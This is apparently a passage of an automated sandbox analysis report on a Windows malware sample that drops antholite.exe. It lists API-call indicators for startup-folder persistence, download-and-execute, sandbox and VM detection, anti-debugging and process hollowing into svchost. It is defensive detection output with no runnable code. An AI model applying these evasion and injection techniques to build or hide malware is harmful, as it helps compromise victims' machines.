                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00720A76 push ecx; ret 0_2_00720A89
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00457186 push ecx; ret 2_2_00457199
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0045E55D push esi; ret 2_2_0045E566
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00457AA8 push eax; ret 2_2_00457AC6
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00434EB6 push ecx; ret 2_2_00434EC9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B0A76 push ecx; ret 2_2_008B0A89
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10002806 push ecx; ret 2_2_10002819
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B0A76 push ecx; ret 3_2_008B0A89
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00406EEB ShellExecuteW,URLDownloadToFileW,2_2_00406EEB
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeFile created: C:\Users\user\AppData\Local\Cocles\antholite.exeJump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041AADB
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0071F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0071F98E
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00791C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00791C41
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_008AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_008AF98E
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00921C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00921C41
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_008AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_008AF98E
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_00921C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_00921C41
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CBE1
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0040F7E2 Sleep,ExitProcess,2_2_0040F7E2
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-98421)
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_0041A7D9
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Window / User API: threadDelayed 3000
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Window / User API: threadDelayed 6504
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | API coverage: 3.9 %
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | API coverage: 7.7 %
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | API coverage: 5.6 %
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5632 | Thread sleep count: 233 > 30
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5632 | Thread sleep time: -116500s >= -30000s
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616 | Thread sleep count: 3000 > 30
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616 | Thread sleep time: -9000000s >= -30000s
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616 | Thread sleep count: 6504 > 30
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe TID: 5616 | Thread sleep time: -19512000s >= -30000s
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0076DBBE
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0073C2A2 FindFirstFileExW,0_2_0073C2A2
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_007768EE FindFirstFileW,FindClose,0_2_007768EE
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0077698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0077698F
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D076
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0076D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D3A9
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00779642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00779642
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_0077979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0077979D
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00779B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00779B2B
Source: C:\Users\user\Desktop\Rgh99876k7e.exe | Code function: 0_2_00775C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00775C97
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_0040928E
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C322
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C388
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_004096A0
Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00408847
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00407877 FindFirstFileW,FindNextFileW,2_2_00407877
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0044E8F9 FindFirstFileExA,2_2_0044E8F9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BB6B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419B86
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BD72
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_008FDBBE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008CC2A2 FindFirstFileExW,2_2_008CC2A2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_009068EE FindFirstFileW,FindClose,2_2_009068EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0090698F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD076
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD3A9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00909642
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0090979D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00909B2B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00905C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_100010F1
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10006580 FindFirstFileExA,2_2_10006580
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008CC2A2 FindFirstFileExW,3_2_008CC2A2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_009068EE FindFirstFileW,FindClose,3_2_009068EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_0090698F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD076
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD3A9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00909642
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0090979D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_008FDBBE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00909B2B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00905C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407CD2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000003.2141943230.00000000011D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000006.00000002.2223625474.000001909C4D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: wscript.exe, 00000006.00000002.2223625474.000001909C4D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T}i
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000003.2141943230.00000000011D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: bhvA838.tmp.3.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077EAA2 BlockInput,0_2_0077EAA2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00732622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00732622
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00724CE8 mov eax, dword ptr fs:[00000030h]0_2_00724CE8
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_025334A0 mov eax, dword ptr fs:[00000030h]0_2_025334A0
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_02533500 mov eax, dword ptr fs:[00000030h]0_2_02533500
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_02531E6E mov eax, dword ptr fs:[00000030h]0_2_02531E6E
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_02531E80 mov eax, dword ptr fs:[00000030h]0_2_02531E80
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00443355 mov eax, dword ptr fs:[00000030h]2_2_00443355
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B4CE8 mov eax, dword ptr fs:[00000030h]2_2_008B4CE8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10004AB4 mov eax, dword ptr fs:[00000030h]2_2_10004AB4
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F3500 mov eax, dword ptr fs:[00000030h]2_2_010F3500
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F34A0 mov eax, dword ptr fs:[00000030h]2_2_010F34A0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F1E6E mov eax, dword ptr fs:[00000030h]2_2_010F1E6E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F1E80 mov eax, dword ptr fs:[00000030h]2_2_010F1E80
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B4CE8 mov eax, dword ptr fs:[00000030h]3_2_008B4CE8
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00760B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00760B62
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00732622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00732622
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0072083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0072083F
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007209D5 SetUnhandledExceptionFilter,0_2_007209D5
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00720C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00720C21
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0043503C
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00434A8A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0043BB71
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00434BD8 SetUnhandledExceptionFilter,2_2_00434BD8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_008C2622
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_008B083F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B09D5 SetUnhandledExceptionFilter,2_2_008B09D5
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_008B0C21
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_100060E2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_10002639
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_10002B1C
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_008C2622
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_008B083F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B09D5 SetUnhandledExceptionFilter,3_2_008B09D5
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_008B0C21

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: 2_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,2_2_0041812A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Cocles\antholite.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Cocles\antholite.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Cocles\antholite.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 2_2_00412132
